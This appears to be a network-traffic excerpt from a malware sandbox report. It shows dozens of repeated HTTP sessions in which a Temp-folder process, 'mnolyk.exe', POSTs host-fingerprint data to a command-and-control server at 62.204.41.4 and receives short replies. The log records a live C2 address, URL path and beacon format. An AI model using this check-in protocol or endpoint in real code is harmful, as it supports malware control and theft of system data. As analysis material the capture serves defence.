                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            283         192.168.2.4  49978        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:48.712591887 CET  472                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:49.005692005 CET  472                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:49.073304892 CET  472                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            284         192.168.2.4  49979        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:49.239264011 CET  473                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:49.301810026 CET  473                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            285         192.168.2.4  49980        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:49.476222038 CET  474                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:49.539666891 CET  474                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            286         192.168.2.4  49981        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:49.709877014 CET  475                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:49.773339987 CET  475                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            287         192.168.2.4  49982        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:50.300928116 CET  476                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:50.366807938 CET  476                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            288         192.168.2.4  49983        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:50.645662069 CET  477                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:50.709820032 CET  477                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            289         192.168.2.4  49984        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:51.388411045 CET  478                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:51.453898907 CET  478                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            29          192.168.2.4  49724        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:37:31.965739965 CET  218                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:32.030860901 CET  218                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            290         192.168.2.4  49985        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:51.647161007 CET  479                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:51.711379051 CET  479                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            291         192.168.2.4  49986        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:51.969969034 CET  480                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:52.035185099 CET  480                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            292         192.168.2.4  49987        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:52.696926117 CET  481                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:52.760353088 CET  481                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            293         192.168.2.4  49988        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:53.036499977 CET  482                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:53.101223946 CET  482                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            294         192.168.2.4  49989        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:53.655632019 CET  483                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:53.718446016 CET  483                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            295         192.168.2.4  49990        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:53.902748108 CET  484                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:53.966175079 CET  484                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            296         192.168.2.4  49991        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:54.132076979 CET  485                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:54.197141886 CET  485                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            297         192.168.2.4  49992        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:54.369069099 CET  486                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:54.435513020 CET  486                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            298         192.168.2.4  49993        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:54.619810104 CET  487                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:54.682399988 CET  487                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            299         192.168.2.4  49994        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:54.852514029 CET  488                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:54.917341948 CET | 488 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            3 | 192.168.2.4 | 49698 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:25.130949974 CET | 169 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:25.194020033 CET | 185 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            30 | 192.168.2.4 | 49725 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:32.936275959 CET | 219 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:33.002540112 CET | 219 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
